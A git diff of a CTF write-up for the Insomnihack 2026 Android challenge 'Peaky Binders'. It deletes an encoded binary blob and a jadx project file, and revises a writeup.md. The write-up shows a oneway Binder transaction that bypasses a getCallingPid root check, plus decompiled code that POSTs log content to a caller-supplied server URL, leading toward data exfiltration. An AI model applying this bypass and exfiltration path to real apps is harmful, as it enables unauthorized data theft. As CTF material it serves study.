z?(}<&#})Jo*Cpav>!OeUa#Tv2f6q(aL0D}LLtFa7!X%jAiq-MQe#Lo_T*$e`rS!S)R?sKQkV*PB?|OFuqC-?F%dq)*hM{1t)!73LcFy>C4COw;5i9Uvy0UH9Bwe z{dQryPf*t0P4@Has=ucU4*J^pT)yq+?{86OWh{#^s1@K)(YV9+OY;FBQyLB$8 z_@p!3hRypPcNv}Ew>UzKg_Y4g34x<4VwKi`HAoB;06^{|W1 zwf+aRZ7dcaCJr0B$fhSrE@F?)1@s+Nt>?jQ)~8x?|Gh1ncI{0yo_%~XdvIi@?IkMYul285nRd4C29QpN`jxo zF|~b;>DS{0qhG}iyB=2@Q%nli~|y zhje%V+~K}OaaQO3vXA#$zmCy9Rr|nx@jQ*rYf|WFzZKF6*D?Rz;(6%DvWNUwF-Yqt zA7?aP`^Ejgpik(>KWyArY`l`xEiN&x7RCJ!8$W1|gC92T{{r|ze-zC@1l-3l3)A9kAu zbjD-HjOeD%1E-;va2~*Z%pq~KmU;_YGJdK!p!4++(ofK5(DVWUhhxxbFCY-rqcaRo@D#B<$o00l<2dC zHn$&OZN+;R%9`_%{q2~^bGM=~Q*>)Fi!baicr!mCk6$-wUiA3XZuM{5ml7`~;VYEe z``a7ArN5=&C&Lwm9sPq4Dy{)nNpJVlHjkgkXWf!lHZ&DZf*WLS(qX8|ucen80pufuZQhyKfsjRW4`zqaw^os9kdei)v)SKqnP;Y*H z{Y~h&IK`SRAAOpB)<>m>xOML$JL>l@j>V35r|_fsM(bGbFG)Lw`qcign?C!Ut0e8L zJy|z9w{4@iWA7ne3!ht!PQ)C^s@I+2a`xjohuMm)EWRTBDtxBTgX%L!pMrU7Yw?zh99Hjht@Ho0 zfww$azO+6I`Fd7@FWc5WSMdC6pBVD*`_;jROl{<}1-e`C z>s*Z;y}wp$)|rXk9cUl@DD{%*i_}XVjemcB`vuC1*|`=E1$bdSjXndVy`bo#47q|RH>%33E>lTvti}bq!uQSW9)=wM2o19nP4V~{m z!_QyhQ92MWwlDS#?mabM`2D5ggpZrjW9SFJ1m18S@%Ghx{$PUt^P$;}b@EZ2;TwFd z^Csb!{rtI{+Gl_pasB){UiFqIE7NN3{}tzjQ+^=ZYFug^Wa4qKPV(_X=XB!p&IF%U zh5~0?W$Z#RznU+4=@#(SzUmlHJJBDECw=J-$nJTIrd=_{o_%VZ z6`UT#SKgg{T0Cz6_I(D{zE75|WDoInKlN23i)^a;xWivxpU|)3hxQ4I1vsGaC-qakWbLNuAPdxGG_^Ox8!TlRCp%ov@{!9Ct&(Y8Nocu?8R%AOf zUKD5kmi8-5AM0P<5A4}aXWUo@Ps9xqZ(av-SJx=wD+=J@A75INx60J zq;-QGlX=$I{Pt&3&K~o;{64e;W77EFdDMsgXU|sb_ZT#vDsDU*UThyH5B2Ri$lkyG zKK-mO$T!L)qaPDLP6b~3xJ^bM1=H^3w6->KVrx4;oP=C{Tx#8Lc0$fR`f9BYgl8S; zSk?y@!fO-0z282{-bH)0e}nj_((q`yQrEV^;B^ z?({8x?RAcmr=P}}nM;GXd)Ua?KF7&Ywz$NniBqj}obcRXMF%b$canTbAKmy8y!J`q zJGy(BJM^Yj>r`uR**$LY@g_dM&)8aek#5a8jTjS0|C9QX(U+}9Kdrb>rtjINzx-sd zd3GB#{tmp}|NJ^T?Y)V7vm&0%o2Fxb-|;Z`aK?u&Z8JN!2A`hK#HdzSZO*H^8dzRaA}{vMpZ zKN8ZvkMCM&ACi2>a3=k%PswjO@2|9$mkl&l{|EhS3{t;R^q6}Wam4tpd{xQnRsDZ1 z(ck-v)@0IUIPYoQ+-u%jPJ0D>gZRrdbiBVD>w5X-KK=rJWbWMmXm53Mi?+`9j!j{9XIj_a1u^2}m{pH2?hW0Me>&*JM z&fn7JvG0H{T+b|Jo{fG>=^y%;KSw*(xT^0M=?#jXFEk%?J4e$vmc2e^ z_!5lxid*sTSmUeocX^;c%R~EI?JE3P^S#E%A$X;|wU1Xhw5Rry>&)6DZ|vsJ_bu;n z^fQKM@m?bNu~X!4smf=pU;FWRh_c3l`f04_U6|Ij-e2@P4VD+{7is-1lCI`f^V{KHo}SKs z^qV_>LT=Y^_WUHA2mc#5?0B;NWxq>dzpE=B)I7Kve!_WB^MdNb{g;h-MHBaBBf)Av zG6R0w&*Bf~DaEa0nWvtDpKyIDes(ALNzPNUm){R++=#zp*$*lnTU^>-6wKUcamg>+ zc-7W#Klm{HL%yVsZhWnP-*7)D|FE$){oX=4(LTb)yaKs7@BE?e6W#-km$q=0#e3I% zm*n^Vm`;-`JasJJKEO7>nPZQcA6 zw1w-&#e1J)|DKm*)V;sXxkTeK!%J-VNq^JU>4(~{T?~9E$6;{Zn2=jB^Al^sF39k}u)HYfR7-h;0+c-d7vir1vPR#)~Nb8@~D z-2FyZ+BbPvE1&cj-s1^2V|;gUKWMhr-RIIrZ^Uh!DjOYXA7*21v4cO+_w%jiTlamc zC(fJuzPl;sRW>y2{P1eZXOaB;AlW|w4f&Sha5%oYy?c2p{k{fnA5X=H=8Z?Gx3Q~W z@IyCPljQl1UH|vfdiNK`KPy{XufiF=pSHB)=-1)L!bygFl=i+`>%Wjc|L#NcObQ({ zFIT{;bxE>ablW~-e`ip3r#@UCnt55jD>jnQ`!*wo-gMi08?7O_>AR57w_k?|wg6sB z)4sFOcu_nJ_rc#x@a5Mzdgowq*?mt;S#tVyPm}Ue&Y9BU^4Eb4*AYvZFN=o0efOew zE{7<~KgEaTxxnui*!8fVFV9APy|eTFywv&f5^yHx%QvBCeJ|eo_1B=S@34n)+V2y^ zhvH|y`7(`;-p42DtV_@d=L6}%$L$hywg2_{&~FRS*7`n%)<||t9dsmJ5!yb`tjw?EnDkj!AZA% zAD>s*++ErAvgG{^bzg;-_Wa$Z>*jCsep0bMiQmnu_($tp%dB4%4_*RJozEJYiFsXP zOn#yG^AhsVF6YzMpw9c7#>O1?X}ZVNXZ6)S!8dJxwW2GXg`zW{#2<{eg54SFW`%)J;odtNl@9)Alf0N$ykv;yn3m(Nx(bs!DPha*`-8gk$Bd?QN z-Zj>t>%NCzeX}#JnDIgU`cwM(IH2<}#s7`eJ&jMvuN2>f`?H2G=~7AYN5Ac6q!}b@Ox!X zfm^@3d93!k6j<%Sy#0jl_8$V@1hC29Rni-aW99EGV85T>@8v%PzBdCKz899f&kyj) zC*3-wwa>j1d$!Nm2D`u2cbxt@;Ggkr)M{~ZnkA92N{+6XZ zf7AZ+5|W>1mRmH}|8bg`ljsp>@C7 z{qMxu_ePRU{FO=e{`_+F3*I$YxXd-rr=Rq4MD4^Ioy(f_l3SNuXJ{5X;)gjua5Cv! z;4SnO4#f?>e$YK^sMCkh_g~ZQ*C|#eyB@dew)Q!i%HsQt&=?`t+UF?n7FIae8_{+; zZC0jEJkqt53BH5hOLcs=elJz)&1vxbFGoW(!+5dSR*TPXi@;c06(YUA)tV}aNB)*v zXK62!P0&+pR~-ABKu`Ys;d}JG&-g^qyipU4yXdd^i`Z_)&2r%M4qy$*`Zni7#-{Ce zZ>J^jTixc-Y1`iwJD+UfD1fW;JzIOP8`Ea!oAUtqqx{JGgWl3@Le7V&v+q!3SK*6W zd}*C7o#`D+I3BIeI_(kq(=7e9Mr`|&{T(IQeF0g7Q*&}?PvMj-A)TatzLCJY%Zx4g zQ_0}f-c9`bd&#fxxlKc#+w#jFw6@UwQJoa>|Eno<{CkQo!@uTh?Q{J2vpTi!Bdu)d zawNyy-Ovfg-J9S?yvTP7^6S27WVHR z<=<)JB*c4ef_}Oz_WNBYBX_THusxxdP`@Ef=`ZxNwDIy3y3{*o|L#YAzc_X*j`MkR zz5z0f}u6Mm7lzY6pjj(6QpoZf<2Jl@|$+h4&?Fiy;VNB2m-0?uCc)_r0( zx_TefOTTaELHAVXoeqY;z?wkA2y`cx)dLO!_9(4by4_)oS zy2-2Whnz{WKC#%o>k@QBKlXldD)!%Gkwrk>+faXg3NxM^8sMP{p>tt|GrxLN5u(! z2i(UIyXVonHhVUy_a84XINI+H=D`m=bB|G{->5AUo8-ykZ4UI59$;UK*hw^F;mMwRH zYcpvppVjY!iGF_lqjQtcx3xym`!KJ+ZvC`R*Le5+v`*5y1?gXUwtgA6?oWR*QSZmJ z_E$RN!Y^BPdJK4r!`fXuD7Kq(6E{!mKIq-_OIsIxn!Zb!r{4|TF#c#hPo6($kH43G z?Y(?^{}S?}?`8kD1V5c?#{z4|?)Ot#|1AXiL?10b``rZIX>PCMsq?NQV8=g0q!1YT<+yN-F8v8Ql5yovLZ1GI;JX=Aqhx6?n6#q8f@-zVV* z8m;|&LuH3IxnKWy0>Agar>QRjm-N5CNz{k_cM@`j`hKL3UUXg_`pr}L$a|^NIr2w< z)!B;P+1oP>`;IFdW7Sd;SI4wB{F+GU=88pGZ$(u=;^ zF59WU^ceb&UBk*Q(wUNt7n=VY5o62`uK5CMF#JOw?QZLlTg=J0@pE~+RUGVW8wUI z82aLI#MmsRk9|+Mkv#mqm(CRL=WI?s`BjoV#sxJ?U!3Hs?=)!#4cv;0E$ zb2?WF>qT2{cFq<&<5u@*qN6i?{H-;vYqo6G9iOCq1!d_wxv!Rw>F-VGjfJ>Ufc-sE#NRLe)(xG1KO4SV>oK=JGUZPJtFquS zH%3tec$TC*nO^j{DBcB~z3ijLfw?_b=J)kt^S5aZvOk#xSH$1$7Jb>xj=Q3=3I4|=J8u|m1PC$x8&kwdw`$H6_@P;zL3i=+n%fOd(+L_zFdR9AKS>?mTN+{ zmYdAwGlg6=cT=vInaoxAU!2*Oi*wVtN@g}!%w3kN(w@(4&ef=IW+!qD`Zcnb=bD*f zu9iKR%V*c;s#(TJ_L5vBdrL0P!bA3EJ_DZ}r)`!#`{_Fa%;mrq!Eq2=>%mzB_l3}4 zO`9t~^JZvI!ovYLnS`flc-sSyv+#NsJOiIwj|>yYQb4B7$R-*0BkPpWS-ebd|JI|6 z33Rd&-AH#+NKF!}c-;=9H71FHvyb$f9 zZHhjZ(N{3*ft>-zN@JgLW*R$)M%zw&hIZRN#hkSdFIwR3N0EIKyk3DWu7LMV=ti<^ zL06lQ?Fw{v1+s23y3E64F?$2LU_Qw5`-<43NnItg4Lxo`cUPjv>q$58`DW_2o3}$khOgW#^`3^kf+Iozg9*a(o z!dnJclkcL>kvD*wM^~~>o!?TZ0>40gg*QtPJjp%~(%*}aWf%Ih<1~h*#;N?f6dg4FEuL%H?)GnH zEdLGoh|y6E+!cJNiVmvqU4gF}{K{Sp{IHnW4gcftK1I5n&l(GiJ@|={r-n~f=v!rO zsxp=;=u=}UW*^khSVFJOK(8_UiN_+TM9P!Ofqo;W--V3juWtC;iQe`@V;a5ff#xiF zyUXxUf^YFupkE%oBH)VDEl?N3v&K$^@iGs;Rrs1iPc_C(8Gaj?jqq>_{Mqr7&$h=& z-RWuG@iFK4C_6q%j*o)lBf?fq^tC|B)3=UJ#fRv|jElMGCivI{-Rt3FJ9M|g#}=cD zMy5@7-i^;WGd^$5m5DtSaF%jb{sJ*b@<+rV*kr8`e-6J6t3S+Xw zSgK~2>lkY_WQwxqA^+|8C$SVe)~U-A59hIAF}of;W5eu5^n45c^#c48{bi+R^p~wz z|AeOTPwMLtZx!Hq9=#TG2a$JuF6L92H!YRiEy#O5@zd(Lmh0}HMQ8uK8DCrAO)-G@ zAo}30i9Wbx%LeC275Hl!9q&i)72}&lY@x9hV}~YuRe){qcaN&ry+&E`SDB+5*sg*u zHNNy+&wTcLdtL?KaBzLSIfvg%puSc ze-+1HjL(X{V#e|(9~OU2$6v$oS9APT!KJxOe8+}|_1FiwHNOOW7o+s}6*>P}FtA(k z8#}+xW5X)revWyy#@H!qeuY*k`#N~x&1TlleG&bN@V9`EY5doXEX-AWmTYr|f95Cp zH1NL?_G^+Cm~Z7@k@K$wY#C=S#&4{Dnel1j+9duph2Lm?*8Il&nswtd@EggelqZGj zkBYO8)eZB7lP~Y&Yl=VQYmiI6TE@y(WjxDgD#ktwyJ6 z^CD;K33R9Na~pQK3!2yl8nMPAcBuq*iQ%{4crQ8r!}wQn_9-xy;%I9wVl2tl3y%M~ zv(LP<&z!SQ+1aP$>{DQDYW);t?}Yyf_S$RgQ%A-cGR|jYpII{xHThhoPQI(SR)p^Y zZ810_WUnyKEFfQ%*inzRVV^A~u4(0DRqCu^^`Wv_O8>s)^@PdocG zoP0GWU)9N1aq@{5*{A5_%RBj+87p7I$ycL~9MuzQ-GsTX5W*)3%Zo_V@FOaiL zdo#oDYSNZRXPO6Pzli#n7{7pA73%B8e%Kw_HT-i9UK;SCHD{CliqCmxH{@%{hMf3t z+kOoF*CHf^tzu@RgA9-T(0{&WL9;hq+WG+D; z#2?zU@2SF98Gf`rC`A?YYyG$x%+Hsm9H@V7xAaP74}C~ z`I_b@*`^5nJZn^~Pn+1QLM&_;`^a}$A0ngd)^K)f(m#gJeAbN*6YsXL7tz{V`)RL&B^DVG!jkgt%n<0k^H$ewaRI;U?P zU#MiYF1m#Ha0}xO|6nYaq0s=gM0*pt3)JUx=P~ZkVUBgbbjlvLj-OX@+P{sl{$bs( z@t1=>dT7w1ao2R?F2Afj?uzI|DNhRLx6b&o9XU1r#*tGtVZCYgALxmC`Cl1co9L@V zo`=T*W50;4BY2OAfeZL&h4@j={22OKkDOY6+=`r+p`QYBGCv}djW3)7pyML25q)Fg zispq1^IjcWRKY!ujcUY`Ir#_e?fAm_r)zv!iLd+^vNB%S`xT=d;Jy{P886wFA>YgJ zt(O^}Yi4f3{=^aElh9%;HTl~uRrt!odj+108TRg(ZAQK#ZxG0x{%GisdIGqS&>TW1W2?!5Us z&x%(w(A`Jc$!C41OtIab)6|3UR0YPI$G}U>nlgrdMKKups!=ced%>;wLAKQX(#{

I(zMG}Cprg68%VN`&o6SHlY9(X?xmXu8fp6R@`={VNaE|IBu_hRSDn{oQa{PE z`fefZA$k3%PCApWR5weKepKE|Qu_{)+61R|)tyHYF2Sn(e3I&qCH2x#ntnv%H6+QW z@ul4BAf)g0BwmxcP@C$){#Q_*Bu$XK4tDbS4wCx4lBD+CBqOU?V~B?6~Xntr@LgtFPNOu#tz9S{m52#lcXo_J8ILq_7ajl%U@($KQ;xYdijz*t6uo! zo3gvgYWF@MTWGFKi(!NMhVb@FOVQ7}z~lQ>ho6V%6aN8x;N8d=^-1mX_XT%DL_8GS=%pyvKy zhE|;)b0?KMz}YQ#pgG;2QkSDm_rAzm<$Shb?hiJ=gWiu&N8Z%=ZC3X)FM(&BSrHM$7dc<-jO=4CoR26ov+oXG-j-ka%8p>5yJ_dnioQl zUMiU}aNE0M>8D72Q@A-J&tpT~wdnmqgTB&FjXo9W!Q5W~Pv08n>~T~}e$8KgK z&av$oe%#(CZE+3GuEr7EMoe26B&ejX~RE*E* z%~X-RZ1CH=lQ@cuPZY^Zq&z9SU#~g;u3{72UskvmsX!~nw{*W$anud2KMuE>|M zYs|PZ_YFDsMk2@9;qI@QeIc}XgOk-;O2#8&Jue+1PcgFzom_8p8grjjfxh0nRJrTV z)31gMMyI@)X_(KzOXpeMNO8AP#C8>M#paCw_C@bS{JILRJpFWk*W_<`Ho(=;{Tp)C zWFN-9@d08)1^MILc4R=me3HD?T-z?i$og5HycF1H0l(ILOI`G%S8+h#`;maCRx*Njh;C%r;?A?*>{}umsB8%?pb$_Y*9&Cf(m+<=rc>((2{dCRU_f*9{ zW3nQ6jc0tj%9t!l*TBGcs(DyNo1vli3%b`9JTVwvC)%}73GrV^`Einmza`QB z#zgzUMEeTLPmnzPLy2~+<-_)e6YbK~ACf%$p+x&96YWP5?Ke{XBa(+-!{;o?>*&|` zEFJjvjfwWtD1Rnsza`QBLCT*C+7Bk$-%9!OLHk3AcFFeVLHomrcHQ~>Wzc>o(Y~DW z{|(xYB-$I4zZkTy;j?_t%P${X2--I$+OMYkrJ((mMElQC);`DU?_i=``@Fvj+8;`^ z-zUF|n-a{W{mPk!9UpH3i+kVZ*WQt0pM7veoDQ9eTX z_eoyf=O)?(t8)_J7p^3}B6T5t$rFxW*)wcUetu4(U9`eJb;`d-^8AT@=i=@mnI!qj^GFww#K$_4+QXF8m(FLx_Mf2~%By{U*sjl; zNS??4%xCexnY4;@oGUACgm&~elJqtHe4FyGl0y0$6YWc(uQQ1>+Ja5e|3Cu2>=M%d z=|uZd=u01OBBk+=r2k|B{~pSZk-UHCE=e@Qv=sgC0%j@npHAS`_zvm+I^}TuEk*tu zFzO%UTq#V+Jd!l_Q^d-OiMtGAv zB`V?KCHu1UF_?P_hTfz0C|5o~h z`u{NHPm?_TU*hvJlBc~?`86*Kt{?pm&?lsSA?5!=^7J+LhwV$HuQi9@`q6(ff&XdB zpCx(vFXyxLIjH=XIkDMU#CCSs*I0|K73Vq>QYW&|z-;n-4 zQx55C&2cR9uXJ#-?+8ij74e>oe{ZEOr2lowUm$t;xAFN{=xg1z6#ajIej)vnDSwgV z>A#21$D;pV1THDN@MtX;;(L;ENdFy_L;8N59Kvj(Pp|kJ_AMmn9Zt~GI1TAdB-(|m zAHA*gxsRkcrSxi&WJ;4i+SDn3a{sXGV^P8E$=%sqaaCt|d7^yfA4T!?oMGrU7_|S$ zu3}wm&ieFwjKye~`5e=x_DYm7vI;b?}^L7J1+Op9j8_E7N~5{Hi|i`kvB;9`I-M zfje@Y+tkv{yN-Ut2=@GE-oKhg*Osy^_eec!Lk$cyFx0?M149iA zH89k`Py<5^3^g#+z)%ANYv7feo)_hS(vzBKlsB~j2EAJz{x{UXPy<5^3^g#+z)%B2 z4Gc9f)WA>!Lk$cyFx0?M149iAH89k`Py<5^3^g#+z)%B24Gc9f)WA>!Lk$cyFx0?M z1ONUt@EZNL0{_jryz26wclkpu|0S2tyZrqwuep4D#NxT#hgEE z{6Uw$$K}7`^51az2VMTK%Rlb&-*@?wF8_?n54rpcF8_+l|H0+oclq*B%l8Q`Kh5Q5 zx%?cLKhNbGT)xreFL(J?m*3#>SG#=D45D=wdR`GU*y`ffe{o#yhlyZkYi-*}2`|KBd(d73S+Jl*EMxW?w+ zIK$?zJui4Vb8Y^`b8UXz`8Hqke4F3r@}GTyE&s&}ZGP7UHvdDH7dO~) zRI>S~%h$Mkr_1kl`JBst$K?%|N1H7Cc`m=&<-1+}ewQ~~9$jJkZ*=)?m(RQWkjwL% zOOgI7x;%FIL6^VV4YZ>WKx28J3KYG9~=p$3K;7;0dsfuRP58W?I|sDYsd zh8h@ZV5oti28J3KYG9~=p$3K;7;2!W2DWY4w0+yP&!CUeY1i)CIli|rdsk($FfqAn z&(xmTJ^Q9+R^C3ffA7@6v4fXf9G$!@vn*Oc-={PD1+$|^-#9ilvv21ele1%jy6m!> zZ`gdz*v;E-+PdjF^P>WnpV-mCFw+fe%au0)m8H)hP&aLQmH7#Sfnc^=7cCo*&dpnI zj5lq*X6ttTp4eaZ`gXv*3CeT4y48FZ@B)7Yq6dA6^Jxd zJ|C3NBdvoY8F1^~U6))ucJp0#8Z)oj@Xfhp&&jUXHd-DjW$qnamsyuNC$pZ445jt> z%IM7O*wpx)lgjr@?b^43eBbQu$!UF<**!IJP#+GA@7-^@%)5^8NqH%;yxH@>mz zjP>iWz>4XyeYTYS@F;}a8;QxhFfTke`N&avvG_3Qb|!4qS%?ql;J$olr9N&LX z#i_}Ivx{)kW}L?0eh#=3*pcSI)cDx$@tNH#^o~Gc{J(H%)wqPPR=~ zx0+@Ub^Ojfdj)q2wdb^2#>T|$MHkX=8kOfJ8jKjHr$B53U=8)_0szIQy^~Y4oI!1f zYR2hlE%mq*|C!K)R$sSgVsdO^e0DrKi`rG@&qKCbckY{*+<9O&dS*)7o#WGYOioA7 zPBs~V7%{U^fu^=q#^lDP{%q<4E>ur%Nz$&BRwSb=g9+?kiV)LnAr+iy`cX2=aZ8hV z+w#g*i+~t3)6of3tvU&)?Q2(Gi1Ay78Re5vgGJSL17oXI=L2%J(%Mb@d!^Fa6Z9{C zkyCy5Oso*}80ufH4=Y|by=Qj(w!M?173l7ny4|t3b9{>4vt|+kJZ^D_^N2y3PNlA+ zNzVU@ZP#v%o+ak*&5o?RF!g@`jjiOL*N$AUVQuz8KHYZCg?v!mD@fz|aI5}#jp?>B zv(n@vBUF{wu0S6nc0{fc$?3`QiLuJ;bh|*zIkDAp+xX1nYLz7Ega3rFeS0Td^gLl~=lKGR zAKxA(Cywo!o}8SXoEh7@XJ&R)s|4`zW0mR21BSEX#_j}i1>tx9%;dyHtH);d&5rLi zs+ygg^7Sa(j6-L8{#+RLU4b!nV2K&y53a|Ak2}#x>T@Z5Vv_Mg@~ce{lQC~xd+CL1 zg#yQ1At*^OGBZ0qyMJcI%p_5L&+J_%?c0eirYEO%PSU=AYIf!Hq={U+rZOi?OwR0_ z-c!+fX!#h<>o_3VV}Z#DXKrCs;C+tR(clm(SNpVf+;T87zH@fZfk`()R$3)6L{<=C zCux`%L2bJTB32Kx)8kV!6vsSv1&>wdf5xGg#Ib}lVxuC9{dkL35iW`M#M{iIVPtGk znVBRS?we{6d9H|@-SButM4zejJ+&*^dC$bCvWdMrj~kP+N5&X-Gew(iFp{0xp{riN{ZaOHiQ%zs-RIeOrikJjf) zQM9(BTgRgJ%(N!6uw9eZ!s0c(e#>>wO6%WRgr1Sss)c4MZ+0;m+?OXe-=} hcFURQ-X;G#xUL4JarEdT|E0mk^61f5f8)-7{C_d&cP;<` literal 0 HcmV?d00001 diff --git a/2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx b/2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx deleted file mode 100644 index 5aa8652..0000000 --- a/2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx +++ /dev/null @@ -1,149 +0,0 @@ -{ - "projectVersion": 2, - "files": [ - "../PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk" - ], - "treeExpansionsV2": [], - "codeData": { - "comments": [], - "renames": [ - { - "nodeRef": { - "refType": "METHOD", - "declClass": "com.peaky.binders.PeakyService$1", - "shortId": "DebugCheckFile([B)V" - }, - "codeRef": { - "attachType": "VAR", - "index": 131080 - }, - "newName": "serverUrl" - }, - { - "nodeRef": { - "refType": "METHOD", - "declClass": "com.peaky.binders.PeakyService$1", - "shortId": "DebugCheckFile([B)V" - }, - "codeRef": { - "attachType": "VAR", - "index": 458757 - }, - "newName": "len_content" - } - ] - }, - "openTabs": [ - { - "type": "class", - "tabPath": "com.peaky.binders.Achievement", - "subPath": "java", - "caret": 83, - "view": { - "x": 0, - "y": 0 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.AchievementAdapter", - "subPath": "java", - "caret": 369, - "view": { - "x": 0, - "y": 0 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.MainActivity", - "subPath": "java", - "caret": 5293, - "view": { - "x": 0, - "y": 1512 - }, - "active": true, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.R", - "subPath": "java", - "caret": 400993, - "view": { - "x": 0, - "y": 191555 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.PeakyService", - "subPath": "java", - "caret": 449, - "view": { - "x": 0, - "y": 108 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.IPeakyService", - "subPath": "java", - "caret": 2059, - "view": { - "x": 0, - "y": 627 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "resource", - "tabPath": "AndroidManifest.xml", - "subPath": "", - "caret": 344, - "view": { - "x": 0, - "y": 0 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - } - ], - "cacheDir": "/home/cato/.cache/jadx/projects/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969-d1321210fa1b70152852835e73296d91", - "enableLiveReload": false, - "searchHistory": [], - "searchResourcesFilter": "$TEXT", - "searchResourcesSizeLimit": 0, - "pluginOptions": {} -} \ No newline at end of file diff --git a/2026/insomnihack/mobile/peaky_binders/writeup.md b/2026/insomnihack/mobile/peaky_binders/writeup.md index 0bc4278..63ca849 100644 --- a/2026/insomnihack/mobile/peaky_binders/writeup.md +++ b/2026/insomnihack/mobile/peaky_binders/writeup.md @@ -33,7 +33,6 @@ The app seems to be used as an Achievement Tracker: The first two achievements are trivial. For the first you have to enter a name containing `shelby`. The second requires to press a button twenty times. The PeakyService is an exported Android Service that exposes a custom Binder interface. Through this interface, it allows external processes interact with three specific methods: `DebugCheckFile`, `isAchievmentUnlocked` and `enableDebugMode`. -This is our entry point for the exploit. The function `DebugCheckFile` unlocks the third achievement. This has to be the secret command. @@ -47,35 +46,9 @@ public void DebugCheckFile(byte[] bArr) throws RemoteException { } Log.d("PeakyService", "Called from a root process: " + callingPid); PeakyService.this.logToFile("DebugCheckFile called from root process - PID: " + callingPid); - String str = new String(bArr); - PeakyService.this.logToFile("Caller name: ".concat(str)); - String[] strArrRetrieveLog = PeakyService.this.RetrieveLog(str); - if (strArrRetrieveLog != null && strArrRetrieveLog.length == 2) { - final String serverUrl = strArrRetrieveLog[0]; - final String log_content = strArrRetrieveLog[1]; - Log.d("PeakyService", "DEBUG serverUrl: " + serverUrl); - Log.d("PeakyService", "DEBUG logContent length: " + log_content.length()); - PeakyService.this.logToFile("DEBUG serverUrl: " + serverUrl); - new Thread(new Runnable() { // from class: com.peaky.binders.PeakyService.1.1 - @Override // java.lang.Runnable - public void run() { - try { - HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(serverUrl + "/logs/").openConnection(); - httpURLConnection.setRequestMethod("POST"); - httpURLConnection.setDoOutput(true); - httpURLConnection.setRequestProperty("Content-Type", "text/plain"); - OutputStream outputStream = httpURLConnection.getOutputStream(); - outputStream.write(log_content.getBytes()); - outputStream.flush(); - outputStream.close(); - Log.d("PeakyService", "HTTP Response: " + httpURLConnection.getResponseCode()); - httpURLConnection.disconnect(); - } catch (Exception e) { - Log.e("PeakyService", "Failed to send logs: " + e.getMessage()); - } - } - }).start(); - } + + //[28 lines of Code removed for clarity] + Intent intent = new Intent(PeakyService.ACTION_ACHIEVEMENT_UNLOCKED); intent.putExtra(PeakyService.EXTRA_ACHIEVEMENT_INDEX, 2); PeakyService.this.sendBroadcast(intent); @@ -84,21 +57,14 @@ public void DebugCheckFile(byte[] bArr) throws RemoteException { ### Bypass the root requirement -The first problem to tackle is to circumvent the root check. +To unlock the third achievement we have to call the method from a process with `PID = 0`. +Usually having a PID of `0` is not possible for normal user space processes. +Thankfully the Android API helps us out. -```java -int callingPid = Binder.getCallingPid(); -if (callingPid != 0) { - Log.d("PeakyService", "We allow a root process only: " + callingPid); - PeakyService.this.logToFile("DebugCheckFile called - rejected, PID: " + callingPid); - return; -} -``` - -The Android API reference for Binder.getCallingPid states the following https://developer.android.com/reference/android/os/Binder#getCallingPid() +The [Android API reference](https://developer.android.com/reference/android/os/Binder#getCallingPid()) for `Binder.getCallingPid` states the following: > Warning do not use this as a security identifier! PID is unreliable as it may be re-used. This should mostly be used for debugging. oneway transactions do not receive PID. Even if you expect a transaction to be synchronous, a misbehaving client could send it as a asynchronous call and result in a 0 PID here. -To abuse this bug you can use a function like this (by the courtesy of Claude): +The wrongful usage of `Binder.getCallingPid` as an authorization mechanism makes the PID check trivial to pass. ```java private void sendOnewayTransaction(byte[] payload) throws RemoteException { Parcel data = Parcel.obtain(); @@ -110,13 +76,50 @@ private void sendOnewayTransaction(byte[] payload) throws RemoteException { data.recycle(); } ``` -This proves there is a way to call DebugCheckFile and get our third achievement but there is still no flag in sight. -### Leak file content +Wuhu we got the third achievement! +I hoped that the flag is then somehow shown on the screen but this was not the case. + +### Further analysis + +I left out 28 lines of code from `DebugCheckFile` earlier: +```java +String str = new String(bArr); +PeakyService.this.logToFile("Caller name: ".concat(str)); +String[] strArrRetrieveLog = PeakyService.this.RetrieveLog(str); +if (strArrRetrieveLog != null && strArrRetrieveLog.length == 2) { + final String serverUrl = strArrRetrieveLog[0]; + final String log_content = strArrRetrieveLog[1]; + Log.d("PeakyService", "DEBUG serverUrl: " + serverUrl); + Log.d("PeakyService", "DEBUG logContent length: " + log_content.length()); + PeakyService.this.logToFile("DEBUG serverUrl: " + serverUrl); + new Thread(new Runnable() { // from class: com.peaky.binders.PeakyService.1.1 + @Override // java.lang.Runnable + public void run() { + try { + HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(serverUrl + "/logs/").openConnection(); + httpURLConnection.setRequestMethod("POST"); + httpURLConnection.setDoOutput(true); + httpURLConnection.setRequestProperty("Content-Type", "text/plain"); + OutputStream outputStream = httpURLConnection.getOutputStream(); + outputStream.write(log_content.getBytes()); + outputStream.flush(); + outputStream.close(); + Log.d("PeakyService", "HTTP Response: " + httpURLConnection.getResponseCode()); + httpURLConnection.disconnect(); + } catch (Exception e) { + Log.e("PeakyService", "Failed to send logs: " + e.getMessage()); + } + } + }).start(); +} +``` +`DebugCheckFile` sends logs to some server. The log content and the server URL come from `RetrieveLog`. This seems to be some functionality for debugging or telemetry purposes. -Looking a bit further into the function the content and server url is fetched by `String[] strArrRetrieveLog = PeakyService.this.RetrieveLog(str)`. +### Weaponizing telemetry 